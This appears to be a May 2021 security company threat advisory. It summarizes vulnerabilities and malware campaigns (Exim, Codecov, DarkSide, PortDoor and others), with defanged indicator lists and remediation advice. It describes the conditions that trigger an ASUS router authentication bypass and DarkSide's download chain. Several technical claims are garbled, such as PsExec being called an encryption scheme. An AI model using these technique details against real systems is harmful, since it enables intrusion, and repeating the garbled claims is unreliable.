BRAINTRACE
THREAT ADVISORY REPORT
MAY 13, 2021
TABLE OF CONTENTS BACKGROUND ...... 2 ADMIN ACCOUNTS AND COMMANDS EXECUTED AS ROOT BY CISCO BUG ...... 2 A NEW QUALCOMM VULNERABILITY ...... 2 CRITICAL 21NAILS EXIM BUGS ...... 3 CODECOV COVERAGE TOOL HACKED ...... 4 NEW TSUNAME DNS BUG ...... 4 FIVEHANDS RANSOMWARE ANALYZED BY CISA ...... 5 ACTIVE DOUBLEDRAG, DOUBLEDROP, AND DOUBLEBACK MALWARE STRAINS ...... 6 BUER MALWARE VARIANT RE-WRITTEN IN E-Z RUST...... 9 NEW PINGBACK MALWARE TARGETING WINDOWS ...... 10 VULNERABILITIES DISCOVERED ACROSS APPLE'S PRODUCT LINES ...... 11 AUTHENTICATION BYPASS VULNERABILITY FOUND IN ASUS ROUTER ...... 12 PORTDOOR MALWARE TAKES DOWN RUSSIAN DEFENSE FIRM ...... 12 MORIYA ROOTKIT USED TO BACKDOOR WINDOWS SYSTEMS ...... 14 VPN & CRYPTOCURRENCY CREDENTIALS BEING TARGETED ...... 14 SIX VULNERABILITIES DISCOVERED WITH REMOTE MOUSE ...... 15 MILLIONS OF DELL SYSTEMS AT RISK ...... 16 THE LARGEST PIPELINE IN THE US ATTACKED BY DARKSIDE RANSOMWARE ...... 16 TWITTER TIP JAR SPARKS PRIVACY CONCERNS ...... 17 VULNERABILITIES CURRENTLY EXPLOITED BY RUSSIAN HACKERS ...... 18 POTENTIAL SECURITY THREATS IN RECYCLED PHONE NUMBERS ...... 19
BRAINTRACE.COM CONFIDENTIAL 1
BACKGROUND This report was created to update our clients on up-and-coming vulnerabilities and exploits that our security experts have discovered. Our team works diligently on researching threats and vulnerabilities to provide you with a safer network. If you have any questions, do not hesitate to contact us.
ADMIN ACCOUNTS AND COMMANDS EXECUTED AS ROOT BY CISCO BUG Cisco has fixed multiple security flaws that would give remote attackers the ability to execute commands or create rogue admin accounts as a root user. Other security updates have also been released that address high and medium severity vulnerabilities within different software products. Cisco's Incident Response Team has stated that it is not aware of an active exploit in the wild of these different vulnerabilities at this time.
Affected Systems ◾ Cisco SD-WAN vManage Software
Vulnerability Overview Analysis has found that the attackers do not need to chain them with these vulnerabilities to gain successful exploitation. These bugs can also be exploited in a low complexity attack that does not require user interaction or even authentication. The bugs, however, only affect the software operating in a cluster. Verification of the software running in cluster mode can be done by going to the Cisco SD- WANvManage web-based management interface Administration > Cluster Management view. If these vulnerabilities are left, unaddressed attackers will execute denial of service, escalate privileges, and remotely execute arbitrary code.
Recommendation It is recommended that computers and running software are running the current most up-to-date operating systems. The link above will also give customers the location of the appropriate fixed software release upgrade.
Patch URL https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage- 4TbynnhZ
Reference https://www.bleepingcomputer.com/news/security/cisco-bugs-allow-creating-admin-accounts- executing-commands-as-root/
A NEW QUALCOMM VULNERABILITY A new vulnerability is discovered in Qualcomm's Mobile Station Modem (MSM) chips. They have an ongoing series of 2G/3G/4G/5G systems based on these chips. These chips (SoCs) are used by more than 40% of mobile phone companies. Some of them include big names like Google, Samsung, OnePlus,
BRAINTRACE.COM CONFIDENTIAL 2
LG, and Xiaomi. Hackers often target MSM because they are trying to find a way to remotely execute malicious actions. One of the ways how attackers can access the modem is the Qualcomm MSM Interface (QMI). QMI is a protocol that is used for communication between modem software and external subsystems.
Affected Systems ◾ Android
Vulnerability Overview Some of the malicious activities that a bad actor could execute are accessing text messages, call history, and listening to their conversations. Attackers could also inject malicious and invisible code on the victim's device and unlock the subscriber identification module (SIM). This is where authentication information is saved.
Recommendation It is recommended to update the newest patched versions of the Android software to prevent possible future exploitations.
Patch URL https://www.qualcomm.com/company/product-security/bulletins
Reference https://www.bleepingcomputer.com/news/security/qualcomm-vulnerability-impacts-nearly-40- percent-of-all-mobile-phones/
CRITICAL 21NAILS EXIM BUGS The Qualys Research Team reported vulnerabilities in the Exim mail server. Exim is free software that is used on Unix-like operating systems. It is also pre-installed on Linux. Researchers published that Exim is used by 60% of internet servers, and it is also the world's most popular MTA. Mail transfers are an easy target for malicious actors. Once they gain access, they can change private email settings. Exim was last year already a victim of a cyber-attack by the sandworm team. BinaryEdge published that more than 3,564,945 Exim mail servers are using the vulnerable version.
Affected Systems ◾ Exim 4.94.2
Vulnerability Overview This Exim mail transfer agent (MTA) software vulnerability allows malicious actors to execute remote attacks with arbitrary code. This will enable them high root privilege. Ten of these vulnerabilities are remotely exploitable, and eleven locally. When these vulnerabilities are combined, they allow hackers to take complete control. Some of the actions that could be executed are installing programs, data modification, and creating new accounts.
BRAINTRACE.COM CONFIDENTIAL 3
Recommendation It is recommended that all Exim users upgrade to the newest Exim version. This will prevent future attacks from exploiting vulnerabilities.
Patch URL http://exim.org/mirrors.html
Reference https://www.bleepingcomputer.com/news/security/critical-21nails-exim-bugs-expose-millions-of- servers-to-attacks/
CODECOV COVERAGE TOOL HACKED An application can contain millions of lines of code, and if the code is not reviewed, there may be possibilities that the code can be vulnerable to exploitation. Codecov is a company that has a tool that measures the code coverage of a company's source code of an application. Code coverage is a software testing technique that stress tests the amount of code contained in an application. Codecov's tool has been hacked by modifying a Bash Uploader script.
Affected Systems ◾ Codecov clients using their Codecov coverage tool.
Vulnerability Overview The Bash Uploader script is used as data collection for the code coverage reports of the customers of Codecov. The researchers found that the hackers modified this code around the end of January 2021, and the modification would send the customer details to the hackers. The change to this code could have sent credentials, tokens, and even git remote information of repositories.
It was possible this had to do with an error with the Docker image creation, and that the credentials to the Bash Uploader script can be extracted.
Recommendation Update credentials, tokens, or keys that were present in the environment variables. Verify code at line 525 for modification, and please see the article for an example of the script.
Reference https://www.bleepingcomputer.com/news/security/popular-codecov-code-coverage-tool-hacked- to-steal-dev-credentials/
NEW TSUNAME DNS BUG Domain Name System is required for every page visit. It is also an attractive target for malicious actors. Researchers from SIDN Labs, InternetNZ, the Information Science Institute at the University of Southern
BRAINTRACE.COM CONFIDENTIAL 4
California discovered a new domain name server (DNS) vulnerability named TsuNAME. This vulnerability is used for DDoS distribution. Google Public DNS and Cisco OpenDNS have already updated their software. This bug does not impact unbound, BIND, and KnotDNS.
Affected Systems ◾ DNS
Vulnerability Overview The TsuNAME vulnerability is attacking recursive resolvers when they are misconfigured. It will execute a high number of queries to the victim's authoritative server. For this action to be completed, three steps are needed: cyclic dependent NS records, vulnerable recursive resolvers, and user queries. Misconfiguration is preventing retrieval of IP address that is connected with NS records. This will prevent recursive resolvers to properly communicate with the clients regarding that DNS part. The full technical report can be accessed at https://tsuname.io/tech_report.pdf.
Recommendation Mitigations for TsuNAME are currently available. CycleHunter tool is used to detect and fix cyclic dependencies in DNS.
Patch URL https://github.com/SIDN/CycleHunter
Reference https://www.bleepingcomputer.com/news/security/new-tsuname-dns-bug-allows-attackers-to- ddos-authoritative-dns-servers/
FIVEHANDS RANSOMWARE ANALYZED BY CISA Since 2019, data has been stolen by ransomware gangs from about 2,103 different companies. There at least 34 different ransomware gangs in the wild. Some have already become heavy hitters, while others are just starting but are making a name for themselves. CISA has chosen one, in particular, to focus a report on and what we need to be looking for to avoid future attacks.
Affected Systems ◾ Servers utilizing RDP ports.
Vulnerability Overview Analysis has found that FiveHands ransomware appears to be DeathRansom's successor and just as financially motivated. FiveHands is the responsible group that exploited SonicWall's zero-day bug. FiveHands uses a public key encryption scheme called PsExec to execute ServeManager.exe. It will then continue erasing Volume Shadow copies to keep data recovery from happening. The payload is a 32-bit executable file that, when executed, will try and load into the memory an embedded module
BRAINTRACE.COM CONFIDENTIAL 5
that is decoded with a supplied key. The module is then decoded and checked that it has a PE header. Once verified, the payload is then executed.
Recommendation CISA recommends that the following actions be taken to prevent ransomware attacks from FiveHands and other threat actors. Further steps that can be taken include: Maintain up-to-date antivirus signatures and engines. Keep operating system patches up to date. Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrator’s group unless required. Implement multi-factor authentication (MFA), particularly on all VPN connections, external- facing services, and privileged accounts. Where MFA is not implemented, enforce a strong password policy, and implement regular password changes. Decommission unused VPN servers, which may act as a point of entry for attackers. Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests. Scan for—and remove—suspicious email attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header). Monitor users' web browsing habits; restrict access to sites with unfavorable content. Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs). Scan all software downloaded from the internet before executing.
Reference https://www.securityweek.com/cisa-analyzes-fivehands-ransomware https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a
ACTIVE DOUBLEDRAG, DOUBLEDROP, AND DOUBLEBACK MALWARE STRAINS On May 4th, 2021, FireEye researchers disclosed that new malware strains, named Doubledrag, Doubledrop, and Doubleback were first noticed in December 2020. The threat actors behind these activities are called UNC2529. Many countries were targeted, including the US, Europe, Asia, and Australia. Victims were targeted fit tailored phishing emails. It is known that they have used more than 50 different domains.
Affected Systems ◾ All Systems
BRAINTRACE.COM CONFIDENTIAL 6
Vulnerability Overview Phishing emails were carrying URLs leading to a malicious .PDF file and JavaScript file combined in a .zip format. The .js file has the Doubledrag downloader. Other versions had Excel documents with an included macro which was carrying the same malicious payload. After execution, a dropper is downloaded. The dropper is a PowerShell script used to create a backdoor on the victim’s device.
Indicators of Compromise MD5: ◾ 39fc804566d02c35f3f9d67be52bee0d ◾ 44f7af834ee7387ac5d99a676a03cfdd ◾ 4e5583e34ad54fa7d1617f400281ba5 ◾ e80dc4c3e26deddcc44e66bb19b6fb5 ◾ 169c4d96138d3ff73097c2a9aab5b1c0 ◾ e70502d020ba707095d46810fd32ee49 ◾ 62fb99dc271abc104504212157a4ba91 ◾ 1d3fcb7808495bd403973a0472291da5 ◾ 6a1da7ee620c638bd494f4e24f6f1ca9 ◾ a28236b43f014c15f7ad4c2b4daf1490 ◾ d594b3bce66b8b56881febd38aa075fb
Domains: ◾ adupla[.]net ◾ aibemarle[.]com ◾ ceylonbungalows[.]net ◾ bestwalletforbitcoin[.]com ◾ chandol[.]com ◾ bitcoinsacks[.]com ◾ closetdeal[.]com ◾ digitalagencyleeds[.]com ◾ daldhillon[.]com ◾ erbilmarriott[.]com ◾ desmoncreative[.]com ◾ ethernetpedia[.]com ◾ farmpork[.]com ◾ fileamazon[.]com ◾ gemralph[.]com ◾ gamesaccommodationscotland[.]com ◾ isjustlunch[.]com ◾ greathabibgroup[.]com ◾ logicmyass[.]com ◾ infomarketx[.]com ◾ lottoangels[.]com ◾ jagunconsult[.]com ◾ mangoldsengers[.]com ◾ khodaycontrolsystem[.]com ◾ oconeeveteransmemorial[.]com
BRAINTRACE.COM CONFIDENTIAL 7
◾ maninashop[.]com ◾ scottishhandcraft[.]com ◾ onceprojects[.]com ◾ seathisons[.]com ◾ simcardhosting[.]com ◾ skysatcam[.]com ◾ stayzarentals[.]com ◾ smartnhappy[.]com ◾ touristboardaccommodation[.]com ◾ stepearn[.]com ◾ towncentrehotel[.]com ◾ sugarmummylove[.]com ◾ vacuumcleanerpartsstore[.]com ◾ techooze[.]com ◾ zmrtu[.]com ◾ tigertigerbeads[.]com ◾ totallyhealth-wealth[.]com ◾ towncenterhotel[.]com ◾ uaeworkpermit[.]com
MD5: ◾ 4b32115487b4734f2723d461856af155 ◾ 9e3f7e6697843075de537a8ba83da541 ◾ cc17e0a3a15da6a83b06b425ed79d84c
URLs: ◾ hxxp://p-leh[.]com/update_java.dat ◾ hxxp://clanvisits[.]com/mini.dat ◾ hxxps://towncentrehotels[.]com/ps1.dat
DOUBLEBACK-
MD5: ◾ 1aeecb2827babb42468d8257aa6afdeb ◾ 1bdf780ea6ff3abee41fe9f48d355592 ◾ 1f285e496096168fbed415e6496a172f ◾ 6a3a0d3d239f04ffd0666b522b8fcbaa ◾ ce02ef6efe6171cd5d1b4477e40a3989 ◾ fa9e686b811a1d921623947b8fd56337
URLs: ◾ hxxps://klikbets[.]net/admin/client.php ◾ hxxps://lasartoria[.]net/admin/client.php ◾ hxxps://barrel1999[.]com/admin4/client.php ◾ hxxps://widestaticsinfo[.]com/admin4/client.php ◾ hxxps://secureinternet20[.]com/admin5/client.php ◾ hxxps://adsinfocoast[.]com/admin5/client.php
BRAINTRACE.COM CONFIDENTIAL 8
Recommendation It is recommended to take proper cybersecurity mitigation steps. Regular scanning for the reported IoCs can prevent device compromise.
Reference https://www.zdnet.com/article/researchers-find-three-new-malware-families-used-in-global- finance-phishing-campaign/ https://www.fireeye.com/blog/threat-research/2021/05/unc2529-triple-double-trifecta-phishing- campaign.html
BUER MALWARE VARIANT RE-WRITTEN IN E-Z RUST A new variant of the Buer malware is being spread via emails disguised as DHL shipping notices. This variant comes with indications that it may be prepping to possess a malware-as-a-service (MaaS) capability and is written in Rust, a newer and easier-to-use programming code.
Affected Systems ◾ All Systems
Vulnerability Overview The malware comes in two flavors: one written in Rust and the other in the more traditional C programming language. This shift may help to allow the bug to avoid detection by antimalware programs. Buer itself is a first-stage downloader to enable threat actors to gain a toehold and persistence onto a network. The email itself contains an Excel document with a macro payload embedded in it. Once enabled, the malware conducts a usual contact attempt with various command- and-control servers for additional downloads and instructions.
Indicators of Compromise Domains: ◾ Serevalutinoffice[.]com ◾ orderverification-api[.]com ◾ Gerstaonycostumers[.]com ◾ authcert-ca[.]com ◾ ocumentssign-api[.]com ◾ docusigner-api[.]com
URLs: ◾ Miyfandecompany[.]com ◾ https://cembank-api[.]com
Emails: ◾ [email protected][.]uk ◾ Hernandez@ubstreasury[.]biz ◾ [email protected][.]uk
BRAINTRACE.COM CONFIDENTIAL 9
◾ Patterson@ubstreasury[.]biz ◾ Campbell@rockyourstay[.]net ◾ Henderson@fossilqwanderer[.]org ◾ Powell@onlinefundraisingtoday[.]org ◾ Evans@onlinefundraisingtoday[.]org ◾ Brooks@fossilqwanderer[.]org
SHA256: ◾ A061180b16f89099da6d34c5a3976968c19a3977c84ce0711ddfef6f7c355cac ◾ 3abed86f46c8be754239f8c878f035efaae91c33b8eb8818c5bbed98c4d9a3ac
Recommendation As with most malware campaigns, a successful attack relies upon phishing emails as a first step. As such, proper training and email monitoring will stop these attacks before they even begin when done with other typical security practices.
Reference https://threatpost.com/buer-malware-loader-rewritten-rust/165782/ https://www.proofpoint.com/us/blog/threat-insight/new-variant-buer-loader-written-rust
NEW PINGBACK MALWARE TARGETING WINDOWS Researchers have disclosed a discovery of new malware, dubbed PingBack targeting Microsoft Windows 64-bit systems. The malware is a 64-bit DLL and is persistent via DLL Hijacking. It appears PingBack communicates via the ICMP protocol.
Affected Systems ◾ Windows
Vulnerability Overview The malicious file that loads the malware is a 66-KB DLL named oci[.]dll and is placed into the Windows "System" folder by a malicious process or an attack vector. What makes this malware unusual is that it relies on DLL Hijacking to load the malicious DLL file instead of being loaded by the Windows application rundll32[.]exe. DLL Hijacking is the practice of placing a malicious DLL file in a folder that is trusted by the Windows operating system. The result is a legitimate system application running the malicious DLL file. In this instance of DLL hijacking, the msdtc service runs the oci[.]dll. Once msdtc runs the DLL file, the malware is launched and uses ICMP to receive further instructions from a C2 server.
It is still being investigated how the malicious DLL file ends up in the Windows System folder. Researchers suspect another malware using a malicious updata[.]exe file is behind placing the DLL file in the Windows folder and configuring msdtc to run the file.
For a complete list of known IoCs, please reference:
BRAINTRACE.COM CONFIDENTIAL 10
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the- icmp-tunnel/
Recommendation It is recommended to have strong security practices. To see if you are infected with PingBack, look for the known IoCs on your machine and network.
Reference https://www.bleepingcomputer.com/news/security/new-windows-pingback-malware-uses-icmp- for-covert-communication/
VULNERABILITIES DISCOVERED ACROSS APPLE'S PRODUCT LINES Multiple vulnerabilities have been found in Apple devices ranging from watchOS to macOS. These vulnerabilities include integer overflow, buffer overflow, and memory corruption. The successful exploitation of these vulnerabilities could bypass security restrictions and privilege escalation to match the currently logged-in user and arbitrary code execution within applications in use.
Affected Systems ◾ iOS versions before 12.5.3 & 14.5.1. ◾ iPadOS versions before 14.5.1. ◾ macOS Big Sur versions before 11.3.1. ◾ watchOS versions before 7.4.1.
Vulnerability Overview A brief list of the vulnerabilities is given below:
CVE-2021-30661 is a use-after-free vulnerability in iOS 12.5.3. This was solved via improved memory management.
CVE-2021-30663 covers integer overflow vulnerabilities in iOS 14.5.1, iPadOS 14.5.1, iOS 12.5.3 and macOS Big Sur 11.3.1. This was resolved through improved input validation.
CVE-2021-30665 was given for memory corruption vulnerabilities in watchOS 7.4.1, iOS 14.5.1, iPadOS 14.5.1, iOS 12.5.3 and macOS Big Sur 11.3.1. These were solved through improved state management.
CVE-2021-30666 is a buffer overflow issue in iOS 12.5.3. This was fixed through improved memory handling.
Recommendation Apply Apple patches as they are released and use software with a nonprivileged account where possible. Avoid downloading files from untrusted sources and, lastly, review read, write, and execute permissions on new software
BRAINTRACE.COM CONFIDENTIAL 11
Reference https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-apple-products-could-allow-for- arbitrary-code-execution_2021-059/
AUTHENTICATION BYPASS VULNERABILITY FOUND IN ASUS ROUTER A recently discovered authentication bypass vulnerability in the ASUS GT-AC2900 wireless router before firmware version 3.0.0.4.386.42643 occurs when processing input from a remote, unauthenticated user. This can lead to a malicious user accessing the administrator interface.
Affected Systems ◾ ASUS GT-AC2900 with firmware versions before 3.0.0.4.386.42643.
Vulnerability Overview The session cookie is known as asus_token, which manages the device's session states experience validation failure when an asus_token starts with Null (0x0). The request user-agent is equal to an internal service UA, and the router does not have ifttt_token configured. These conditions cause the request to be identified as authenticated, which occurs within the device's handle_request function.
Recommendation Apply the latest firmware release provided by ASUS.
Patch URL https://www.asus.com/Networking-IoT-Servers/WiFi-Routers/ASUS-Gaming-Routers/RT- AC2900/HelpDesk_BIOS/
Reference https://nvd.nist.gov/vuln/detail/CVE-2021-32030
PORTDOOR MALWARE TAKES DOWN RUSSIAN DEFENSE FIRM A new backdoor type of malware dubbed PortDoor was recently seen in an attack on Russian defense firms. The attacks were suspected to be executed by a Chinese APT group. Utilizing various exploits, the APT (Advanced Persistent Threat) group was seen using many tools to accomplish their objectives.
Affected Systems ◾ All Systems
Vulnerability Overview According to security company Cybereason, the attack began with a tool called RoyalRoad or 8.t Dropper. The tool has been used in the past by several APT groups associated with China, including Tick, Tonto, and TA428. The tool generates RTS documents capable of exploiting well-known
BRAINTRACE.COM CONFIDENTIAL 12
vulnerabilities in Microsoft's Equation Editor. As such, this is why researchers believe the APT group in question is associated with China. Other evidence included social engineering attack styles and similarities in code between PortDoor and other backdoor malware considered to be used by similarly associated APT groups.
Once the RTF document in question is opened, PortDoor communications with a command-and-control (C2) server. In addition, it can conduct surveillance, target profiling, downloading multiple types of payloads, privilege escalation, static malware detection evasion (obfuscation), encryption, and data exfiltration. The file decrypts commands utilizing an XOR key hardcoded in its data.
The file creates additional files in a Temp folder and writes other data as necessary to help disguise its traffic patterns. According to Cybereason, the malware has various commands that can be executed via the C2 server. These include:
◾ List running processes ◾ Open process ◾ Get free space in logical drives ◾ File enumeration ◾ Delete file ◾ Move file ◾ Create a process with a hidden window ◾ Open file for simultaneous operations ◾ Write to file ◾ Close handle ◾ Open file and write directly to disk ◾ Look for the "Kr*^j4" string ◾ Create pipe, copy data from it, and AES encrypt ◾ Write data to file, append with "\n" ◾ Write data to file, append with "exit\n"
Lastly, PortDoor includes techniques to avoid analysis of its activities and multiple methods to encrypt and disguise its actions. All of this makes PortDoor a dangerous malware.
Recommendation As with most APT campaigns, the initial attack vector relies upon a successful social engineering attack, such as phishing or whaling. As such, please ensure your users have trained adequately against such attacks. Otherwise, proper patching and threat mitigation are good defenses against these actors.
Reference https://threatpost.com/portdoor-espionage-malware-takes-aim-at-russian-defense-sector/165770/ https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian- defense-sector
BRAINTRACE.COM CONFIDENTIAL 13
MORIYA ROOTKIT USED TO BACKDOOR WINDOWS SYSTEMS An unknown threat actor suspected to be of Chinese origin is using a new stealthy rootkit. This espionage campaign named TunnelSnake looks to have been operating stealthily since 2018 targeting Windows systems. The unknown malware currently named Moriya by researchers is a passive backdoor that allows the attackers to spy on their victims and send commands to susceptible hosts.
Affected Systems ◾ Affected systems include different Windows systems going back to 2018.
Vulnerability Overview Analysts have said that the attackers of this rootkit have already backdoored different systems belonging to high-profile organizations and Asian and African diplomatic entities. Once inside the vulnerable system, Moriya will capture and gather the network traffic from within the Windows kernel's address space, where only privileged and trusted codes are run. Attackers will also deploy other tools like China Chopper, BOUNCER, and Termite during the post-exploitation stage on the vulnerable system. These different tools will allow the attackers to move laterally on the network finding new vulnerabilities and vulnerable hosts.
Recommendation It is recommended that computers and running software are running the current most up-to-date operating systems. It is highly advised that users verify the attachments within their emails before clicking on the embedded links and only download software from trusted sites or the developers' sites. It is also recommended that users run the most current and up-to-date antivirus and antimalware programs.
Reference https://www.bleepingcomputer.com/news/security/new-moriya-rootkit-used-in-the-wild-to- backdoor-windows-systems/
VPN & CRYPTOCURRENCY CREDENTIALS BEING TARGETED A new widespread cryptostealer variant has been uncovered in the distribution of a global spam campaign, in addition to links through the communication app Discord. Locations in the US, Australia, Japan, and Germany have been confirmed thus far, with the damage reflecting through internal screenshots, exfiltrated system data, browser cookie theft, and the credentials associated with NordVPN, Telegram, Discord, and Steam. The 'Panda Stealer' activity has additionally been tied to the capability to detect crypto keys, and subsequently, the funds potentially contained therein.
Affected Systems ◾ Crypto-Currency Keys ◾ VPN Credentials
BRAINTRACE.COM CONFIDENTIAL 14
Vulnerability Overview Panda Stealer focuses on a business email approach when phishing for their victims. Usually, a quote request is explicitly used. Two distinct methods are actively linked in this campaign, the first being attached .XLSM documents require macros, and the second a .XLS file containing an Excel formula that hides malicious Powershell scripts. The cracked malware strain is similar but uses different infrastructure elements such as C2 URLs and folders. Lastly, because the collector stealer is openly accessible, malicious actors of all intentions can use the resources and create customized versions of the script and C2 panel.
Recommendation Using added caution when approaching Discord links or unconfirmed business emails can ultimately prevent the hidden content of the destinations from entering a local system or account.
Reference https://www.zdnet.com/article/panda-stealer-dropped-in-discord-to-steal-user- cryptocurrency/?&web_view=true
SIX VULNERABILITIES DISCOVERED WITH REMOTE MOUSE Remote App is an application that allows a mobile phone to be used as a keyboard and mouse when attached to a computer system. The users would have to download the app to their computer and install the app on their phone to interact between the machines. Security researchers have discovered six zero-day vulnerabilities that are grouped and nicknamed 'Mouse Trap.'
Affected Systems ◾ Users using the Remote Mouse application for Android and IOS.
Vulnerability Overview The flaws were discovered when a researcher analyzed packet data between the application installed on the computer and the application installed on their phone. The flaws found included the ability to pull a user's password or even replay commands sent to a computer from the remote mouse, maximize or minimize the window of running processes, abusing the app's use of HTTP to check and request updates, and much more.
More info can be found at the link below, and this is the blog of the security researcher who discovered this vulnerability: https://axelp.io/MouseTrap
Recommendation At the moment, the discovered vulnerabilities were sent to Remote Mouse, but there are no further updates. We would recommend removing the app if it is not necessary.
BRAINTRACE.COM CONFIDENTIAL 15
Reference https://thehackernews.com/2021/05/6-unpatched-flaws-disclosed-in-remote.html
MILLIONS OF DELL SYSTEMS AT RISK For the past 12 years, Dell has pushed a driver that has now been confirmed to have multiple vulnerabilities leading to increased system privileges. Estimated at hundreds of millions of Dell products such as Desktops, Laptops, and Tablets received this driver thru Bios updates. Five different flaws are contained within the DBUtil driver and are tracked as CVE-2021-21551.
Affected Systems ◾ Systems using DBUtil
Vulnerability Overview Analysis has found that even though this vulnerability affects so many consumers, the vulnerability is still not labeled as critical. An attacker trying to exploit these vulnerabilities will need to have already compromised the computer beforehand. These vulnerabilities, however, can give the attackers as well as malware persistence on the infected systems. There have not been at the time of this article indicators that these vulnerabilities are being exploited in the wild, but that can change immediately.
There has been a video released that will show how these vulnerabilities can be exploited. It's available at https://assets.sentinelone.com/labs/Dell.
Recommendation It is recommended that consumers go to the patch website to scan for the vulnerable driver. Impacted customers should then immediately remove the affected vulnerable driver. Instructions are available at the link under the Patch URL.
Patch URL https://www.dell.com/support/home/ro-ro/drivers/driversdetails?driverid=7PR57
Reference https://www.bleepingcomputer.com/news/security/vulnerable-dell-driver-puts-hundreds-of- millions-of-systems-at-risk/
THE LARGEST PIPELINE IN THE US ATTACKED BY DARKSIDE RANSOMWARE Colonial Pipeline, the largest fuel pipeline in the US, is used to transport petroleum products between refineries. Unfortunately, the pipeline had to shut down operations in response to an attack by ransomware. The Colonial Pipeline provides 45% of all East Coast fuel. It is believed that the DarkSide ransomware, first sighted in August 2020, is responsible for the compromise and subsequent shutdown.
BRAINTRACE.COM CONFIDENTIAL 16
Affected Systems ◾ All Systems
Vulnerability Overview DarkSide is ransomware that encrypts the victim's data and steals data to leak it to the public if it is not paid. It is associated with Soviet Bloc nations and mainly targets English-speaking countries. The actors behind this ransomware are known to turn a blind eye to hospitals, schools, non-profit organizations, and government agencies.
After gaining initial access to a network, DarkSide actors ensure an organization is not prohibited from attacking and begin to collect all information possible and use PowerShell to download a binary called "update.exe." A DownloadFile command is used through Cerutil.exe and Bitsadmin.exe. The binary downloads into the C:\\Windows and temporary directories before creating a shared folder to place a copy of DarkSide malware inside it using PowerShell.
From there, DarkSide starts moving laterally to the domain controller to collect data and retrieves the DarkSide copy in the shared folder using PowerShell. From here, the ransomware further proliferates to and compromises devices across the network to encrypt assets.
Recommendation Keep systems patched, install solutions with anti-ransomware features, and routinely back up files on a remote server. Further, test to verify your backup mechanisms can survive a ransomware attack.
Reference https://www.cybereason.com/blog/cybereason-vs-darkside- ransomware#:~:text=Like%20many%20other%20ransomware%20variants,ransom%20demand%20is %20not%20paid.
TWITTER TIP JAR SPARKS PRIVACY CONCERNS There is a new feature that is being sent out for Android and iOS systems. This new feature is called "Tip Jar," which lets people give tips to support the different works. Like every new feature or app, there are going to be some possible flaws. Some of the flaws for "Tip Jar" include sending others shipping addresses and handling disputes.
Affected Systems ◾ Affected systems include the New PayPal Twitter Tip Jar for Android and iOS.
Vulnerability Overview The new feature offered by Twitter is a way to support the different people or groups within by giving them rewards or tips. There are various ways that someone will tip, such as using Venmo, Bandcamp, Cash App, PayPal, and Patreon. Twitter has said it will not receive a cut of the tip, but some other networks may charge a fee or percentage. Users are noticing that if they are tipping with PayPal, their mailing addresses are exposed to whomever they are tipping.
BRAINTRACE.COM CONFIDENTIAL 17
The disputes section still needs to be looked at as well, for if a tipper disputes the tip, the recipient must pay a $20 dispute charge plus payment processing fees in addition to the refund. So, in other words, if someone were to give five fraudulent donations, they are not being hit with $100 in chargeback fees once the donations are reversed. At this time, PayPal and Twitter have not introduced what they will do to prevent malicious attackers from abusing this new feature.
Recommendation It is recommended that users of this new add-on be aware that there is a possibility that their address will be released to the person or group that you are tipping. They should look for the No address needed drop-down box to avoid having the address being sent. They are also advising that users please read over the dispute section.
Reference https://www.bleepingcomputer.com/news/security/twitter-tip-jar-may-expose-paypal-address- sparks-privacy-concerns/
VULNERABILITIES CURRENTLY EXPLOITED BY RUSSIAN HACKERS The US Department for Homeland Security's Cybersecurity Infrastructure Security Agency (CISA), FBI, the National Security Agency (NSA), and UK National Cyber Security Centre published a joint advisory that warns about current vulnerabilities Russian hackers are exploiting. Russian cybercriminal groups that stand behind these attacks are Cozy Bear, APT29, and the Dukes. This advisory was made because of the several cyber-attacks that took place in 2020. One of them was SolarWinds which affected many institutions and businesses. Advisory is warning about SVR and its capabilities. Their targets include the US, Europe, UK, NATO states, and Russia's neighbor countries.
Affected Systems ◾ FortiGate ◾ Cisco router ◾ Oracle WebLogic Server ◾ Zimbra ◾ Pulse Secure ◾ Citrix ◾ Kibana ◾ VMWare, ◾ F5 Big-IP ◾ Oracle WebLogic ◾ VMWare vSphere
Vulnerability Overview Agencies warn that Russian hackers have developed sophisticated techniques that allow them to execute malicious actions without being detected. Attackers are using the tool Silver, which will enable them to constantly access and exploit other vulnerabilities. One of the recently exploited ones is
BRAINTRACE.COM CONFIDENTIAL 18
Microsoft Exchange. Silver is a tool that penetration testers use, but in this case, it is used for malicious activities. These attackers are also known to target mail servers, allowing them to access and compromise data.
Recommendation It is recommended to apply available patches and allow multi-factor authentication. Full mitigation instructions provided in a joint advisory can be accessed on https://www.ncsc.gov.uk/files/Advisory- further-TTPs-associated-with-SVR-cyber-actors.pdf.
Reference https://www.zdnet.com/article/cybersecurity-warning-russian-hackers-are-targeting-these- vulnerabilities-so-patch-now/
POTENTIAL SECURITY THREATS IN RECYCLED PHONE NUMBERS About 66% of the recycled mobile phone numbers were discovered to be tied to previous owners' online accounts. Threat actors could leverage account hijacks by recovering the accounts linked to the recycled numbers. Academic research from Princeton University has revealed several privacy and security concerns correlated with reusing recycled phone numbers that could potentially cause many types of exploits: account takeovers, create spam and phishing attacks, and prevent victims from online services account sign up.
Affected Systems ◾ Recycled phones
Vulnerability Overview Threat actors can look through available phone numbers shown on online number change interfaces and check to see if any numbers are associated with online accounts (bank accounts, social media, etc.) of the previous owners. If so, attackers can use these phone numbers associate with the account to reset the password and to receive the OTP sent via SMS before login.
The key to the attack uses the lack of query limits for available phone numbers given to the carriers on the prepaid interface to change the numbers. Besides showing the full numbers, attackers also can look up recycled numbers before agreeing to a number change.
Once the bad actors obtain the recycled numbers, they can launch impersonation attacks to commit fraud and gather the PII of the previous owner. Other threats enabled by recycling numbers also affect both previous and future owners, allowing a malicious actor to hijack the victims' phone account and online accounts and even perform denial-of-service attacks.
Recommendation Consider unlinking your phone number from online services before you give up your number.
BRAINTRACE.COM CONFIDENTIAL 19
Reference https://thehackernews.com/2021/05/new-study-warns-of-security-threats.html
BRAINTRACE.COM CONFIDENTIAL 20